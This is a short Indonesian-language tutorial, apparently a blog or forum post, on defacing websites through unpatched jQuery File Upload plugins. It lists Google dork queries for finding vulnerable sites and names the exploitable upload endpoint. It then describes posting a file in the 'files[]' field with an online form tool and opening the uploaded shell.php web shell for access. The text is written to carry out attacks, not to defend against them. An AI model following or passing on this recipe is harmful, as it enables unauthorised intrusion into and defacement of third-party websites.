Mungkin jQuery File Upload adalah cara mudah buat deface, dengan upload saja seh.
Yang susah ya dork nya, kudu pinter pinter kalo pengen buat nemu yang vuln
Syarat :
1. Dork :
inurl:/assets/global/plugins/jquery-file-upload/
inurl:/jquery-file-upload/
inurl:/jquery-file-upload/
2. Exploit
/server/php/index.php
contoh
site.com/assets/global/plugins/jquery-file-upload/server/php/index.php
3. CSRF
untuk CSRF pake yang online aja biar gampang
Post file? files[]
Langkah :
1. Dorking dulu
2. Nemu? exploit dulu
Blank?? skip
Vuln? setidaknya ada tulisan kayak gambar dibawah
![]() |
| foto : ken7ester |
3. Pake CSRF Online
Post file? files[]
4. Shell Access ??
site.com/assets/global/plugins/jquery-file-upload/server/php/files/shell.php






